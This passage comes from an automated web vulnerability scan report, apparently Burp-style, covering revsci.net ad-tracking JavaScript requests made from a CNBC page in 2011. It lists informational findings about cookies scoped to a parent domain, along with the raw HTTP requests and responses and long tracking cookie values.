7t+OQyz04xvfmym8i4Xs/pSES40AdX6Cz8CIKqCNyk2Wd6aDEkSMysZlkDU6hYDTXETzIDa3EYrl6KPb2zfB8RpwPFUyz8KzuXDHtcugSUzgpVUIfBmEsulXzpd3MW/y5FY7+p+ajbyHOf3twU8fOWUVO863Qr54yAIETx6FwTsGBDk0f/InQ79HzwOm1XllUGkuhSVvZEmcnh6piz9LHdsg2R4xsMhvXQsL6A3FS9EG9mD4pA6lSdme9thAelEZVjJjcGiy4Aq7sAfYP90TyQL5f3JeWlsUfCi9IO3ouNkdj75IzFqyumryw4Tlw+Y2FWyOVfSfodfY0VoRCVZ8VQhNZ1XXXMRhQ=="; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+z8rvh2rOfqkDDDA6eA08p566AWsC6dZEToDZUZ7/JkL2T9iF2WdR9KJhTybAZxS4F8a2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFWddAYMSGIntIJ56bP4P6/Yl+5VXlxUvEZxx6DjOYyj3SuXjsHKw1HvrO7toai4pcTCGhPla2bmfIekz/8JrWzyYVAh7y/AXS96Xtkys7CW8F3vwD20aDbg3Izx+4vTPx1ySj6t0CNQxy2Ul8Kh7RkLH6FyDHOsARlGd973xoWsyOlfL7qENhaqpwNAF0oS4LDRu6oycNFDUMvegV1tERgGXcXGm8s1J7zg9SXQZC7B0Bn3KItqqYN/f+mPxfIprER6In6zAiDVKnUTqQ9qqw90AqLBaYL9wZ89pCI/j9TA7TN6znCM34U+44v5KS3OhrFto9JqDJnjjouMTD3aoJkho6bXUimsrGkc/zFhkUHVRybnp1govghJJ6NUyK4XkUsb6ukJ31X7Ji5lt0ikrpLRZHqRm+gqnWlGoY0IZaRRHfTdU5/6F9M266g7g8ZNWHnfAa/gyR6gIXhg6vorWzXnb99+sQloC32XPa6foOp25COCYcM3mb9hJMy/8os/eUa4zl62ldpvL3rcHZ6M7Pbb9Jqtbt2I4NNI=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JwQLVVzHG+gQ4O3XYcv0liDtqNncA2iFgL2J8AvNQGTGFQ+Pxd0pbW0Xm51WZTYVCOktTrquTMuOZBTTkw/IKBeEE1yCXK3b36BtHZFDnD6taOUzkVsstlxUvHpxx6DjOYyhPvK7p93Kw1M0xFLU8YywpcTCGhJkslmGD09u1vxbq9AgilVXTOe7YLMpaxwab1BrpZaOWmsitT5Y0P/+hoDI8UE/IyAMDpKGXhjriyhJgjfFE+ppfZQ32TSW00gZRkVJOtUxlY5Yo9vJAsssXzzkv8RozjQ2ow5LGokyTciv/oqeGkAgyA6qLu0UTvZKVMEDuiWMmkX0nGp7IALTzvYzZX1VV35S611OmwsUj/BtjCYFwhj0vIFQ3urxzt+UV7sjZoj7YCyIyN9dSpCyqSalgXxc/DVeFlZE2Y7rOhlNQYvwZnJF5d4moBJxG/sDxsjsX8Qa3Gsr4OpMi4bVqNzEkuCaDDEgu1UUc1X8n0QKuxspCuvu8Oejj9SwrWAhkuGz19zcg4YMGb4ewrib0GrKI2iHUVJMOl3syAixj4Kcld+V5pab1CYoBf0xuAw8eHaxH9EOfr4HWvqc7z7Ow+z3iq2GT7UWuqrMJW64IPWHK/tj2DnxcvlKsNNI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:24:23 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:24:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.211. http://pix04.revsci.net/I10985/b3/0/3/1008211/959799423.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/959799423.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb3/kL33k9EF2r0L6q0zBCf2clnbVQswmaXMDRS450iBm6UVyImQE5tom4V71U1T0oSRSaEIpX4BxlKwSDhOzC4DbmFxVBi3YwKtpk/XFo2WgPJPKsSQOhotc9WMwLKSlaWuo2ucgoJrMZKo7cxTxNazaUWcV8AH1Xt3RSiifMFg+RGshM4YdG0UyUpLcODe4Jl01XQoZu7OxMjgrgKyQm2I9JWpCZwyuBDXuBvLpvgzBaoxUCOo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:26:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/959799423.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43418837%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252F%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_evMS="MLsXtSMNZzhvJZE469KkOkhRHfJm5qBSudMGnLg9gqT3HEe3XM9OR5om4StALLEl9sEMwvnCoBpIccfVs6urDw05fHt6PfSqbiWNXR/jCjVKUWrTvUIbcsKagvwG10PsbYIMpsXG1ZYgPGTNKk4xnTkFyZxw+3FBOTrvF5jks9+JkzB/hR0Tkd4oX42bdny92IEJPNNLWe4yV1PTfZSRvnppCJRLCL2ohVJyVYoEVPVkJW78T5TlLreZ2H8/nAR4ctiOctGhaXEazbuzgI0h4pAHsKQIW1G4X4wUVUG5pLlBZNsLTGLu1ilset+uOhC1jNfafldX2PUk1bqmDkVtoM/Skeh91IHEnyyzjkJS7wz6UGgDFsf7IMHHlhGaJ8LrLZ6vygejeyfId1Qcu1uBIBwl6vqu9zmYAgdZ7z8fM3lHostCyPZMFO3BCJ32NO4epSB3BWTkLnwwbQHIDzRUyBRsVAvco8x/LaLOqIFa5vxRY/FjbTt6EZbR+Chh+3x1rS10fzv0zBCcorVoYeH/aQm3ow62YSuwYfMDfZ1RhABUQTnVtlmce15Rxsn2OCBUh+6toejr4T2cDhLXZC69XGDU0PpetZVISrXJ4APF9qsWT77F4wLT4zo6cpo7nRrXpTeNNVU6qfYojwNmWL9eawbGrcVupb3kxWdodWQHy7NTvvw5wjTnXvtmyup8hmB9BqRRtQAS4O4Il259CpV4eRoLgpYo1P2qbzL2sJNgl/Ot5L7tBx3D/soQ1JxEIy613DpS1O0fsKZsW3icNUN/FW+NvfQOaBo5LjzHNy48hySDs+mrPzGCKpsVAq5cgqjYZhN4F52CzNb+3x3nvRkya1M9stHfQus7Ru3jtmyYNgGNMa1V68/dVtrCpITqbV7HHbjLHvlABV/WvRb2OSaMJ4MAbP9aKDdOFQbjOlSbxpRBnqsjyF0Rn9ZCHS2SMk3OFlJ627v6e/JX6rs8tRij7XeS1DvJYIOUyRCiDcaOr2NOlABeK5Qs9V1xN2Xbl9utsOZzninCy5NtTZjxkXDwJxXGvEdjxayqUPD/pJ9NK6E1dup/apyccF5E3TidzG4q/8bqos250kNmw1xYaJumj9mEqR4YSYnBANPhk+VzZcgjK0LcWf9TTLIfUjZB/p9sg5tH9jbnJmAD10ujoXfkvn0NUUoIDNzKtEcKq6SfjwwKgPxKFsvWtmBBij5xKGVtai3hvbxu+VPAob5D0mC23kZJhmgvS+JZO1Nlby9ytNQ8Nq1NIEHqsouw3MXa+LQwlVvk69Z3FAp1Urw5cq0R8Zzx1iEHDUQW2XLL+KtE4gzDXpUs43F/KzmwLcWNUld85lLv+Zs4+2SFI38K/UChrS/uhsXQ"; rsi_us_1000000="pUMV4ymnMBYY7dXKYa4+QIxDgvM/u/LBmb+24q2tXApJiFT0/ChXTUHNBmbDd46t2hFxDCMVaHP4CLq/pZMuoy/ewcD0FX/sKZKTRO7VZ6iPmAiSltSt2s1xurZiR6H24UqyA+Nh2RxjsZeCiFKkk80FLO19B2NlUVN7jrYLH0NcEDW/dc9rzfg7YbyYtEmGqNoKYa5yINjN6e64XwCx4D46jpq6oGI1IZqA3DT3sEnoRJjrPK5azHeuT4nS5vioYImIWn6v3MgSK/RzrDRuAJ9j91dfPNrNfMwdtaDxsR4w4lhnkcahqc2S0BIsn/oyUca/oeTJoQYbwJLsCkiNcMLywz7ZEwnFltdeQOuk1ywxzFOjbg6cfyoxSipYtVjffF7qgITHxcUPT68KNERXMGy+sRKFMQLmeTrdopWZ+1obDjU9/BEAlmJJDLfStO73D27JrDXhrV74uzGERS6h+diijLK75rsaUimseoXwgkl9f4+GeEKI+oEsL4cD/Er0Jg2xRn0TDMY/6HNdLWgdbMF0OTvjnpUeokDF6xcBZRb6ZkGzKTyP9KKrv9f4nmLcxgiwCcguTfu9whhbnlGGiH8sG0kXhP7cBJQprkfqHWxAV5/VukNuzc51qmMzHTKgS0vAwiMvaOSBzvr+LsGh0q5cCKXNbFxLpkQnCitO5j+EBFKWHBE1dbS3z/CiiumJtsDuLFny+6XTFHQx9un0UaEF3Hi4Cn6ZOHY5/DKYyrighviQF7pnMxn0AW0HC6YBeE0Z+48oX+gYVyfMi63VXQoke8h/7W2zU2vN6hMbuhSi/obO8bhOUxNgbfkz+vZwXvf6pPxDaZNxsBR+Clwg4vzXg+Uujg2VkfE1QOkdxCKQUvJiX8Gn5CEfkWDFAyIDkIvHrqZtMNrhyNcl98LTb346dAwOwysbzdoh72IBwFnMAeLBhOWXvCSQNlCmlGDNsOfLen2jioPuq5L0lOONkfTqB/g/KK5rR+9cfyZCtpaiCmMSdDpgHdUuCdCXBN/omF6OdlPGYeUcOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XvGDw6ajlb0l+l8bB/mvXv2SILU062vN9JU++IWvixYNTL9RUomOVux4EU2cJ2sLFszBVubsN1kPUduNKVVw2X0a6dXuhq4qoUW11T6Kyb7dO4m1AbBRrItbPKZi3KdVnQWKicY3QreXyXa7A9NQcvUkbOkE65wOLek+qqT0HDiWaheBzY+dX+jb12QkG3eyrMWDkxFEbzHnXSi+/DhGtr36p4KTjfKGl9Bs1WgN42NWJ2FniUaeyiDvYXQ8ypkErggFNtDtcnjbPQ+h83ld+1XqRT3lTbbXfEOEy39JI3wIVsCxJesH7MFrKtOMDpJXBianiJYXm1MLpOAYQ5M9mK/9rfnhk0VY+Qf8s7QPXBFje+NPjRkGFrocHy4UDzXaW2+2hBDvcOrnJbsgcUe4i/oLDVcOpsxsmW8IS6OMYRkwPdmYgGL5YfRYEKjMsUbmy67Gc2dTg7Y9LTFVnADWyRnzAezIS+NW7wqLkXh4/OzXH9QQWqikfI6wpW9rOG7+vUd3Qoia1crbjTt+gSk2hvt+cVWSF2Fl3akOyZIZyuHBxrsClCfQgStQQmEiNaOXo9zDpzde90duK+NvVriCbGPj9EE7hhcxkgghiN6pIJ6OXaxkG/bXonImQXovRVDCk4kzDJ9VGH3cSj9+1zz8ZP32r48sxAhklxuKayLxCyMX8gmEZ+aHvMTkGDrKSD7FwzFnHyGJpXP1jJgrDSHoeaAkoAFW2UGq5hVOeJ"; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vLj+wWQEAWvERBw6jjPQ4L4Uubk0NaY9wI2qrKXBEJqalRFyzz++kuS0t8FA35bmxx0VW/Jj5TEabtOAJFHV+aNKdWI3SWQJ9jz0Bw9jAtbfMu/qQH+JwD1NWyRhr+2kr+wlN2b1z5lAdiCkUa0tKYvCvYcqJvNr2DqBzL0LgZXnZiFpr9375ifCVfPuexcffVCxFSIZD4D0KRHTCePMwWm1a/QL52xqqK3/EPC9dJo5cMAsCMtcbvBdYOdIlHxdBPvDuxeR2ZbopTxy48YUKWwuNfnOE7KAS/QDmGjcrpZNsmPVSuCuzNjG0Xbetr+S5JM1eVAJ3kb3z2l2IZ2WW9GHMjjRv0LyiI2Re/jldiPIzrGCJCcSNqPBeDZ6O+7HN8haNHgaKNso1Rq3ye0ai8MGB/IZ9bwsWksL5GelM8UcAObPxVqvDg/XIBAa3KIODy5yQCvagc88BkGk1FceYknE/p+04jZHfCAYzhYK1HEoRIbu3P24j76fStGJq1PLWrOZxygaRIXkRRtltrDaYJDCOQ=; rtc_622X=MLvP+AUpZjhn51LJq1jL5845H+4h/q9mFV9PWLgeObIq1v2MeP5Su//CLAsUHtmnDZXK4kSQZQCIxDLsR0aEsBkGAsAzyTZljGHlJ8F8pLRBWXWXz7uFg34VRrvprhNnTJS7l1KD/AemqQQKvgpBrRu6zRd1PlS4lphnBRJBpeskwJoJmbZKeWobkSjufE271gNxb+vGjpijOYcghljOgfhUWq8PpR1yEVDMy+oW7gwkTGdIaRb6g/Xq3Or30JpAH2dHGwxBt0ipA9YKJjFMVIZQK31V1QLJY0/26hIsE0r9Jq+U0jFDM/NxHHaSZrJo9jHW4r5oucRHKSlX8y/cc5KrAbuSKW/UMZEcYXOHxOjzyRZCXEzvqvzF3r/dsstyGLDiA6mhH9UjuQXGSKL5gdR50WkiE5eSfxrzly+vmBebaEkqdS4Gt7Yt0uwjKC295XiU5zdDo2Sny2SsB2meLIHZZNxHHFrzCdI6NLvUFHThiQN093VeOmPJHX/XooE0PamnIXSjhrlGOxxXMhuvciB4rr4mvBDDx8KEL/CMPFEXJ+bmV9F4eIlMMCRCVkuaijphBwE1gD7yspVEFRMCIOPIGS3ZVC4YtTnEi/ZObMue9LKYS4GadB2QjoSz+eeZZScmGcx/7Qvx2LEpDrvmu0NwyrPG+al+u1+tsZFublJ1hzSKEYYON9mwCFD38Z7bwuOaLIkWnSpYGQrS9N/NHLraq+XHHPyc6uP0WHaZCECaLExNZii9II4+Own16NsrTAeV5XAXHgfld9uBcLh3poTW6fhwJ845Le00pp7tTZgvZPdq7HD3/13WJvsbtwI+YQbp1w0yQgLoBl3TfBajALnFHEsGJthFUzUP5B19iiKfkm52MuRMMCMTcICusa1b+Ltr9lKuAyh6t/Xg7C224y8nKFJwmWH4kubZ49AjrCZY6cTymswqqApRHHZhDelGbIXX4JrMIS0+aE9tjtPTYIHzoJ57JY99uTsBSB+WNv2lQYvT5PkV96hWAPmooA9FCronEBizWGdEnE3V0Hzw6+ykj02XZ+wso+h55VR9UWUXd4keI3nupV7cOvOu01JSgi23NaJLepeD5nG69fr3ek38GVZMK9hhpjeIc62eadlZvLbM0T4b4WtfgQOCbPxxCMHE6lrxDOtakbhm5tc4YocgjKNDR1/6YfiH+mZe+DMA51k+4IsIhigntMstNkcDkYa1UprKOIueeJZKM8MC5vBKvtjnv/xHDs90MQTatqF9eWWm+pJDojl44GmCn2Ohj7v5mSyy4uKRY9cL1u2MNAovkoa7Mn0C4kmhJ9lhRwMqMwfz78x2/lwMdBc718wm9N0yiUeMhkKks0s6qW7Xqw2SdQdbDFvcXvzULW3qgFeAHvDwPmPHSziub0EvZeJKWzWWLHuv+U0FoosdBa2NxEVGDk8II9ZWVCLqCDL/5SWW1N/bQ4FqFCqEumS/l+Cb5gTx4vs5ghq8bRjVGN1VK/GaZws6AK5kvkaCpwgwxns+nFQ7407k/fZs/Q/hP4MF1L4wSZYILbNBMPy/vnTMt8BStSq7RAAmKLE8/P7dPuVq8ktYnT2j52Bhr3mncphtNRpccpgn46S5JYO9scYAfaOmgvR89MT4APLRY7zrwYDa4hVKyShzQSWcni9E/1KIg7ZL5sRorT/nlYJWmzz0Pj5HyAJmC4tX7pqB1EQFrxRXeQKJKEK35yYg0UxKdKfPQtNY2wnalRD54z8z/mWLqlDSzHKbpOkrkhxTD/h9jP3ilRdtKXR56JZLb4UbZw8ZQDLz9fmnYRz4FVQpMulh0nk4/KPn+Wq+QKBBQjJogtz2RqlVfkHNmWgQTIM9rF57AAQK3nKJLI1lrdzVAnNIEVzBXDv/yOcyc/PZ9vT5nM8oudLSOHCuLua6tWHcHGGKJEbUnyMRWyU4hF3igiUJLznr2fW20c+mxVfTP6sns+qGFxMOwbT7fu8PscSzP19tIuNGzPflAD+a/nAX4lrGgmvKeXk3QjrCe+FnJY1OpieYm0UvLt2a35gPUVMf/T2wuEZlxxtGFAkn97MYdOamea5K6GTdP5ecy/OLjp65PsDjKzDXILmdYWXagRfngLj3wQpRmPUUznFzSi+X8rkaRrygBJIUyRAhprrb/dL2r+2Vqd75TQD/cVYe/Sb2a/ad6XsAyl8ppmF8v23m/WMY1jvepKa0SNMoTBL3fy7LpvCANROWBbLeeZDFBnKUTUu2jRK8Lr9pOWjZE3J6S9o1SFSfOYQDxH3DoyDP/y5L5EL6O6WTMV4DFPGLdcJE6SU2S+O5G7kJl/3grE/rIdhc4wBmGg==; rsi_segs__1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnVaSOkHFIHZYDJEHWaOW+4wYaiyyY715ckFoFlDXAQEgoeqnG3CUq1eF28RHMrcV0qtaohUjTO3yPCIMPaYnGbhmVSc5VfYij9OMIYKQd6IEV/U7eaOKVrIVUuoozmIGg2QYHf7CkyKF/JXks5veheEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxCr0dOcOWAakM+DFGacGmWh+5Uhp77wIOQppmy+pG7rWBSJx4vC7FSfGZpR7ehelDAvstrVc2Jdr8RyZ8WCX7Fk1y+ArCOEzzuIbVFGmq7OxcjQlpDdPTarGp0vK32z70Ji5lP1psNvLEFcyk9N6J0KkK5m95LVfAOZjxTaNWL4ppvf8krx0ASgjePID6ws4r9VlUIf4Plxy6kzoHl0vm5ccj0PMaSlUQ7Ar162IwwXATfVTnXUaBee7pj3M85480u0WU4HCGXCIfEJ9yORSaEAJ5NqTa5YpOH8znKGuUKQQAzvS3mXo4xdUclbF861o8KEtDiNhMFTMyf+BqlV6rS/2du4G8pJ2kuiyiLQlXq5f5WQA7ER+TEXO0oeZlIjx9RgnBlCibN8kSic2sZkZ/Z0AtmCFkk7b8iHAA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47hsEu65JSW8locAzObnhu4IU3vheM3NskvAjloepK61+AvNQGTGFQ+NxcERbW0Tk562ZjYVCSktDvquDMuuBPQjky/IaNaHE1yGXKzaXaBtH5FPnD6taOU3kVsstlxUvHpxx6jjOYyhPvK7n93Kw1M0xFI9oCqQrDls54EVd2af/P+mr4aIUPtDx67xLmPpSli0jZnVB+zAH/bUTVGVQ3bV/3ZM6XBUrfzgcgkl2NqBfNMacOQA1RtyEdAjscD9S6p+JJrsiYejEsVMa5Gcu58i5u9wMWeriE1+VRrP9GWoISVWsDPdvokl9gbLDdDdyEpZEzMU8TTcyDl4MTQ96wnq89UFYUu1exqd5bvfKOgd/ZS5VS4ASCQ/Bwq3Y6odsBcs1r0dH9Bdd7XFzvxy8buM3hyPhb3/kL33k9EF2r0L6q0zBCf2clnbVQswmaXMDRS450iBm6UVyImQE5tom4V71U1T0oSRSaEIpX4BxlKwSDhOzC4DbmFxVBi3YwKtpk/XFo2WgPJPKsSQOhotc9WMwLKSlaWuo2ucgoJrMZKo7cxTxNazaUWcV8AH1Xt3RSiifMFg+RGshM4YdG0UyUpLcODe4Jl01XQoZu7OxMjgrgKyQm2I9JWpCZwyuBDXuBvLpvgzBaoxUCOo=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:26:50 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 11:26:49 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.212. http://pix04.revsci.net/I10985/b3/0/3/1008211/961894975.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/961894975.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pVfJOHtW0A4KYh9LaIj+x0G4F9zRU+sOohe7OqAUbNvDCQtVo1G6MP6Vy3i752mR8CD5MOaWITT19GmvAHjLO26lbm5fFWrFFMTh5ZgLXiQRjSAdYmdmJxcwmcndbW5GD4QQZOLlE8oZWjFM67BWIP270Sg+rxtsJ21UcoLDyljRZUGiMCPdO16hfc+goh8mSOFKvEaKvG6xta9uKPqvtvA3CVbdeEkhIJ3TjyZrGG6sqwQ+LrbJlL2uqw6tCbi55Z1G4L76xaNQuxpP0iKeULJPEv5fkk8iaittLGEZxTkfFXA58QKuxsoi2qtRtkE7SWndRo4C+Co7u6uHF8hU2HcPVGXSlULnuApfy5eUq8Bac3Q/l/KPuVhm3K080yOHYUlqz0da0TwsEKt8NLUoeiNILawsWTBVqe672cNE2Ew3cY6ZSVQqduHB88tXw/bwNMQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:10:22 GMT; 